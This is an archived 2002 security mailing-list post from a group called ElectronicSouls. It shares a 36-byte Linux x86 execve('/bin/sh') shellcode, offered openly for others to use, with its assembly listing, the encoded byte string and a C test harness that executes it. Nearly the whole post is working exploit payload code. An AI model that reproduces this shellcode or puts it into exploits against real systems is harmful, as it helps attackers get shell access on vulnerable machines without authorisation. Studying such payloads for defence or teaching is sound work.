lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
From: es at hush.com (es@...h.com)
Subject: [ElectronicSouls] - More shellcodes!@#

-----BEGIN PGP SIGNED MESSAGE-----

Dear List,

Here is yet another piece of shellcode you might like to use. :>

# cat linux-execve.c
/* (C) Steele [ElectronicSouls]
 *
 * main:
 * jmp short get_string ; jmp to get string
 *
 * start_shell:
 * xor ebx, ebx ; zeroout ebx
 * xor ecx, ecx ; zeroout ecx
 * mul ecx ; and i thought i didn't like multiplication
 *
 * pop ebx ; load string /bin/sh
 *
 * mov al, 0x0b
 * mov [ebx+7], dl ; put a null at the end of /bin/sh
 * push edx ; argv[1] = NULL
 * push ebx ;  argv[0] = filename => /bin/sh
 * mov ecx, esp ; yes all that goes to ecx
 * int 0x80
 *
 * mov al, 0x1 ; exit
 * int 0x80
 *
 * get_string:
 * call start_shell ; call start_shell with shell with us :)
 * shell db "/bin/sh"
 */

#define DID_YOU_KNOW "that this code executes /bin/sh"\
                     "this shellcode is 36 bytes     "

unsigned char shellcode[] =  "\xeb\x16\x31\xdb\x31\xc9\xf7\xe1"
                             "\x5b\xb0\x0b\x88\x53\x07\x52\x53"
                             "\x89\xe1\xcd\x80\xb0\x01\xcd\x80"
                             "\xe8\xe5\xff\xff\xff/bin/sh";
int main() {
 /* modified from lamagra's execute chroot shellcode */
  int (*funct)();
  funct = (int (*)()) shellcode;
  printf("size = %d\n",strlen(shellcode));
  (int)(*funct)();

 }


#

The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"My mom is making me clean my bedroom."

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlMEARECABMFAj3npegMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltS7QAn1QFjbJ08utl
Jkfpggrt5/ZzUJq8AKCCFXZgmdrMCU04xKMSf7gmxfrb4A==
=nfut
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2 

Big $$$ to be made with the HushMail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ